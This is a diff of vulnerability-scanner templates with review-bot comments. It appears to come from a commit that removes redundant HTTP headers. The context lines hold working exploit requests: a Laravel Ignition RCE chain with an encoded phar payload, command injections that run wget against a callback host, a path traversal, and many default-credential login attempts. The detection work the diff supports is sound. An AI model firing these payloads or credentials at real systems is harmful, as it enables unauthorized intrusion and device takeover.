@@ -26,10 +23,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} @@ -37,10 +31,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}} 
@@ -48,10 +39,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00
=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}} @@ -59,10 +47,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} @@ -70,10 +55,7 @@ requests: - | POST /_ignition/execute-solution HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: deflate Accept: application/json - Connection: close - Content-Length: 144 Content-Type: application/json {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}} 
diff --git a/cves/2021/CVE-2021-31755.yaml b/cves/2021/CVE-2021-31755.yaml index 18d299007e..71be85cd28 100644 --- a/cves/2021/CVE-2021-31755.yaml +++ b/cves/2021/CVE-2021-31755.yaml @@ -15,12 +15,8 @@ requests: - | POST /goform/setmac HTTP/1.1 Host: {{Hostname}} - Connection: close - Accept-Encoding: gzip, deflate - Accept: */* - Origin: http://{{Hostname}} - Referer: http://{{Hostname}}/index.htmlr - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/index.htmlr Content-Type: application/x-www-form-urlencoded module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static diff --git a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml index b0db1c2b47..47b367c664 100644 --- a/cves/2021/CVE-2021-32030.yaml +++ b/cves/2021/CVE-2021-32030.yaml @@ -14,7 +14,6 @@ requests: GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1 Host: {{Hostname}} User-Agent: asusrouter-- - Connection: close Referer: {{BaseURL}} Cookie: asus_token=\0Invalid; clickedItem_tab=0 diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index 383ea4d3fe..ae2f69e33a 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml 
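Review bot: The new `Referer: {{BaseURL}}/index.htmlr` line carries over what looks like a typo from the removed `http://{{Hostname}}/index.htmlr`; the page is presumably `/index.html`, so confirm and change it to `Referer: {{BaseURL}}/index.html`. Separately, the `setmac` body in the context lines below rewrites the device's Wi-Fi configuration (`wifiSSID=Tenda_B0E040`, `wifiPwd=Password12345`, the 5G equivalents) as a side effect of reaching the `mac` parameter, and nothing in the template flags that. A one-line comment above the raw request, `# Destructive: this request overwrites the router's Wi-Fi SSID and passwords`, would warn operators; the template's info block is outside the hunk.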
@@ -14,10 +14,6 @@ requests: - | GET /status.htm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive Cookie: language=en; login=1 matchers-condition: and diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index 9de55d3241..0d381d2581 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -15,9 +15,6 @@ requests: GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Cache-Control: max-age=0 - Connection: keep-alive matchers: - type: word diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml index 78e663ef7f..726f1cffae 100644 --- a/cves/2021/CVE-2021-34429.yaml +++ b/cves/2021/CVE-2021-34429.yaml @@ -16,13 +16,11 @@ requests: GET /%u002e/WEB-INF/web.xml HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - |+ GET /.%00/WEB-INF/web.xml HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) unsafe: true diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml index 8e59a60f28..9a97a4f4e5 100644 --- a/cves/2021/CVE-2021-34621.yaml +++ b/cves/2021/CVE-2021-34621.yaml 
@@ -12,13 +12,10 @@ requests: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 - X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589 Origin: {{BaseURL}} Referer: {{BaseURL}} - Connection: close -----------------------------138742543134772812001999326589 Content-Disposition: form-data; name="reg_username" @@ -77,13 +74,10 @@ requests: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest Origin: {{BaseURL}} Referer: {{BaseURL}} - Connection: close log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In diff --git a/cves/2021/CVE-2021-35336.yaml b/cves/2021/CVE-2021-35336.yaml index 221dabdf34..6fdac1d2be 100644 --- a/cves/2021/CVE-2021-35336.yaml +++ b/cves/2021/CVE-2021-35336.yaml @@ -10,16 +10,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-35336 tags: cve,cve2021,tieline,default-login -# admin:password - requests: - method: GET path: - '{{BaseURL}}/api/get_device_details' headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Referer: '{{BaseURL}}/assets/base/home.html' Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"' + # admin:password matchers-condition: and matchers: diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 1f3cfe52ce..6852d161cb 100644 
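Review bot: Dropping `X-Requested-With: XMLHttpRequest` from the `admin-ajax.php` and `wp-login.php` requests is not as safe as dropping `User-Agent` or `Connection`: some handlers branch on that header (a JSON body versus an HTML redirect), which would change what the matchers below the hunk see. The same removal is made in adobe-aem-default-credentials.yaml, flir-ax8-default-credentials.yaml and ruijie-eg-password-leak.yaml. Either confirm against a live instance that the responses still match, or keep the header where the endpoint is an AJAX one. The matchers for these requests are outside the hunk.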
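Review bot: The relocated `# admin:password` comment now sits under the `Authorization` line but still does not explain the Digest value, which is the non-obvious part: `nonce`, `cnonce` and `response` are constants, so the header can only authenticate if the server accepts a replayed nonce instead of issuing a fresh challenge. Expand it to `# Digest response precomputed for admin:password in realm "Bridge-IT"; works only because the server accepts the fixed nonce/cnonce below`. The matchers that depend on this header are outside the hunk.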
--- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -14,36 +14,24 @@ requests: - | POST /api/login HTTP/1.1 Host: {{Hostname}} - Content-Length: 44 Accept: application/json, text/plain, */* Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: en,es-ES;q=0.9,es;q=0.8 - Connection: close {"userName":"admin","password":"cs141-snmp"} - | POST /api/login HTTP/1.1 Host: {{Hostname}} - Content-Length: 44 Accept: application/json, text/plain, */* Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: en,es-ES;q=0.9,es;q=0.8 - Connection: close {"userName":"engineer","password":"engineer"} - | POST /api/login HTTP/1.1 Host: {{Hostname}} - Content-Length: 44 Accept: application/json, text/plain, */* Content-Type: application/json - Accept-Encoding: gzip, deflate - Accept-Language: en,es-ES;q=0.9,es;q=0.8 - Connection: close {"userName":"guest","password":"guest"} diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 6b23e91841..bb68f1a710 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -11,15 +11,9 @@ requests: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/plain, */*; q=0.01 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - Content-Length: 67 Origin: {{BaseURL}} Referer: {{BaseURL}}/libs/granite/core/content/login.html - Connection: close _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true 
diff --git a/default-logins/apache/airflow-default-credentials.yaml b/default-logins/apache/airflow-default-credentials.yaml index 50bcb9d651..c53dac75ff 100644 --- a/default-logins/apache/airflow-default-credentials.yaml +++ b/default-logins/apache/airflow-default-credentials.yaml @@ -13,22 +13,13 @@ requests: GET /admin/airflow/login HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | POST /admin/airflow/login HTTP/1.1 Host: {{Hostname}} - Content-Length: 152 - Cache-Control: max-age=0 Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login - Accept-Encoding: gzip, deflate - Accept-Language: en-IN,en;q=0.9 - Connection: close username=airflow&password=airflow&_csrf_token={{csrf_token}} diff --git a/default-logins/apache/apache-superset-default-credentials.yaml b/default-logins/apache/apache-superset-default-credentials.yaml index 58bc528ac9..e5ff9cb506 100644 --- a/default-logins/apache/apache-superset-default-credentials.yaml +++ b/default-logins/apache/apache-superset-default-credentials.yaml 
@@ -13,22 +13,13 @@ requests: GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | POST /login/ HTTP/1.1 Host: {{Hostname}} - Content-Length: 152 - Cache-Control: max-age=0 Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login - Accept-Encoding: gzip, deflate - Accept-Language: en-IN,en;q=0.9 - Connection: close csrf_token={{csrff_token}}&username=admin&password=admin diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml index d4e68fe296..95bc7ea11b 100644 --- a/default-logins/dell/dell-idrac-default-login.yaml +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -7,15 +7,16 @@ info: requests: - method: POST - cookie-reuse: true path: - "{{BaseURL}}/data/login" + body: "user=root&password=calvin" + headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 - Content-Type: application/x-www-form-urlencode + Content-Type: "application/x-www-form-urlencode" Referer: "{{BaseURL}}/login.html" + cookie-reuse: true matchers-condition: and matchers: - type: status @@ -24,4 +25,4 @@ requests: - type: word words: - - 0 + - '0' diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml index 78d78f3130..8c71a04c75 100644 --- a/default-logins/dell/dell-idrac9-default-login.yaml +++ b/default-logins/dell/dell-idrac9-default-login.yaml 
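Review bot: The context line `Referer: {{BaseURL}}/admin/airflow/login` in the POST is an Airflow path left over from the template this one was copied from (airflow-default-credentials.yaml in this same diff has the identical block); for Superset it should match the request path, `Referer: {{BaseURL}}/login/`. The body's `{{csrff_token}}` (double f) also looks like a typo for `csrf_token`, but the extractor that defines it is outside the hunk, so verify the two names agree before changing either one.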
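Review bot: The new `Content-Type: "application/x-www-form-urlencode"` line is missing the trailing `d`; the registered type is `application/x-www-form-urlencoded`, and a strict server may ignore the `user=root&password=calvin` body under the misspelled type. Change it to `Content-Type: "application/x-www-form-urlencoded"`. The misspelling predates this commit, but the line is rewritten here, so this is the place to fix it.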
@@ -11,14 +11,8 @@ requests: - | POST /sysmgmt/2015/bmc/session HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 - Accept: application/json, text/plain, */* - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate User: "root" Password: "calvin" - Content-Length: 0 - Connection: close matchers-condition: and matchers: diff --git a/default-logins/flir/flir-ax8-default-credentials.yaml b/default-logins/flir/flir-ax8-default-credentials.yaml index 225cbfa45e..20db518552 100644 --- a/default-logins/flir/flir-ax8-default-credentials.yaml +++ b/default-logins/flir/flir-ax8-default-credentials.yaml @@ -11,13 +11,8 @@ requests: - | POST /login/dologin HTTP/1.1 Host: {{Hostname}} - Content-Length: 35 Accept: */* - X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: closen user_name=admin&user_password=admin diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml index 496b30ecbc..7f40fcc2de 100644 --- a/default-logins/gitlab/gitlab-weak-login.yaml +++ b/default-logins/gitlab/gitlab-weak-login.yaml @@ -13,12 +13,9 @@ requests: - | POST /oauth/token HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, text/plain, */* - Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} content-type: application/json - Connection: close {"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"} diff --git a/default-logins/glpi/glpi-default-credential.yaml b/default-logins/glpi/glpi-default-credential.yaml index 800d8aef3a..4af21aa850 100644 --- a/default-logins/glpi/glpi-default-credential.yaml +++ b/default-logins/glpi/glpi-default-credential.yaml 
@@ -12,27 +12,13 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - Upgrade-Insecure-Requests: 1 - Connection: keep-alive - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7 - | POST /front/login.php HTTP/1.1 Host: {{Hostname}} - Connection: keep-alive - Content-Length: 179 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7 {{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}} diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml index b8adcda88b..8af859b590 100644 --- a/default-logins/grafana/grafana-default-credential.yaml +++ b/default-logins/grafana/grafana-default-credential.yaml 
@@ -9,20 +9,15 @@ info: - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page - https://github.com/grafana/grafana/issues/14755 -# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user. -# So make sure, not to attempt more than 4 password for same valid user. - requests: - raw: - | POST /login HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} content-type: application/json - Connection: close {"user":"admin","password":"§grafana_password§"} diff --git a/default-logins/hongdian/hongdian-default-password.yaml b/default-logins/hongdian/hongdian-default-password.yaml index 6558607526..f6098d34fa 100644 --- a/default-logins/hongdian/hongdian-default-password.yaml +++ b/default-logins/hongdian/hongdian-default-password.yaml 
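Review bot: The two deleted comment lines were the only place the template documented Grafana's lockout behaviour (five failed attempts block a valid user for five minutes), and the `§grafana_password§` payload on the new side still iterates passwords against `admin`, so the constraint still applies. Restore it above `requests:` or next to the payload definition (outside the hunk), e.g. `# Grafana locks a valid user out for 5 minutes after 5 failed logins; keep the password payload list to at most 4 entries`. Unlike the header removals in this commit, this deletion changes what a maintainer knows, not what the scanner sends.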
@@ -11,26 +11,16 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close - | GET / HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Authorization: Basic YWRtaW46YWRtaW4= - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close matchers-condition: and matchers: diff --git a/default-logins/ibm/ibm-storage-default-credential.yaml b/default-logins/ibm/ibm-storage-default-credential.yaml index 05ebbcc3c5..25d1a2fc6b 100644 --- a/default-logins/ibm/ibm-storage-default-credential.yaml +++ b/default-logins/ibm/ibm-storage-default-credential.yaml @@ -11,10 +11,8 @@ requests: - | POST /0/Authenticate HTTP/1.1 Host: {{Hostname}} - Origin: http://{{Hostname}} - Content-Length: 62 + Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Connection: close j_username=admin&j_password=admin&continue=&submit=submit+form diff --git a/default-logins/iptime/iptime-default-login.yaml b/default-logins/iptime/iptime-default-login.yaml index 9924878032..da94fcec13 100644 --- a/default-logins/iptime/iptime-default-login.yaml +++ b/default-logins/iptime/iptime-default-login.yaml 
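Review bot: `Accept-Encoding: gzip, deflate` survives in both raw requests here while the same header is removed from most other templates in this diff, and it is likewise kept in panabit-default-password.yaml, aem-crx-bypass.yaml and aem-hash-querybuilder.yaml. An explicit Accept-Encoding is not a cosmetic header: when the client asks for gzip itself the body arrives compressed, and the word matchers (outside the hunk) only work if nuclei decompresses before matching — presumably it does, but that is the thing to confirm. Given the commit's intent of dropping unnecessary headers, removing the line here too is the simpler and more consistent option.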
@@ -11,9 +11,7 @@ requests: - | POST /sess-bin/login_handler.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 - Referer: http://{{Hostname}}/sess-bin/login_session.cgi - Connection: close + Referer: {{BaseURL}}/sess-bin/login_session.cgi username=admin&passwd=admin diff --git a/default-logins/nexus/nexus-default-password.yaml b/default-logins/nexus/nexus-default-password.yaml index 8cde0421ba..b44818775d 100644 --- a/default-logins/nexus/nexus-default-password.yaml +++ b/default-logins/nexus/nexus-default-password.yaml @@ -11,10 +11,8 @@ requests: - | POST /service/rapture/session HTTP/1.1 Host: {{Hostname}} - Content-Length: 43 X-Nexus-UI: true Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Connection: close username=YWRtaW4%3D&password=YWRtaW4xMjM%3D diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml index 25da32202d..528c4f0c65 100644 --- a/default-logins/oracle/oracle-bi-default-credentials.yaml +++ b/default-logins/oracle/oracle-bi-default-credentials.yaml @@ -10,14 +10,10 @@ requests: - raw: - | POST /xmlpserver/services/XMLPService HTTP/1.1 + Host: {{Hostname}} Content-Type: text/xml SOAPAction: "" Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Encoding: gzip,deflate - Content-Length: 771 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 - Host: {{Hostname}} - Connection: Keep-alive diff --git a/default-logins/panabit/panabit-default-password.yaml b/default-logins/panabit/panabit-default-password.yaml index 1aff766c6b..5974205e14 100644 --- a/default-logins/panabit/panabit-default-password.yaml +++ b/default-logins/panabit/panabit-default-password.yaml 
@@ -12,14 +12,11 @@ requests: - | POST /login/userverify.cgi HTTP/1.1 Host: {{Hostname}} - Content-Length: 246 Origin: {{BaseURL}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Referer: {{BaseURL}}/login/login.htm Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: close ------WebKitFormBoundaryAjZMsILtbrBp8VbC Content-Disposition: form-data; name="username" diff --git a/default-logins/rockmongo/rockmongo-default-credentials.yaml b/default-logins/rockmongo/rockmongo-default-credentials.yaml index 2e2ec7b575..179b53aca2 100644 --- a/default-logins/rockmongo/rockmongo-default-credentials.yaml +++ b/default-logins/rockmongo/rockmongo-default-credentials.yaml @@ -11,7 +11,6 @@ requests: - | POST /index.php?action=login.index HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/index.php?action=login.index diff --git a/default-logins/spectracom/spectracom-default-credential.yaml b/default-logins/spectracom/spectracom-default-credential.yaml index 408747ba1f..e552e1251c 100644 --- a/default-logins/spectracom/spectracom-default-credential.yaml +++ b/default-logins/spectracom/spectracom-default-credential.yaml @@ -11,10 +11,7 @@ requests: - | POST /users/login HTTP/1.1 Host: 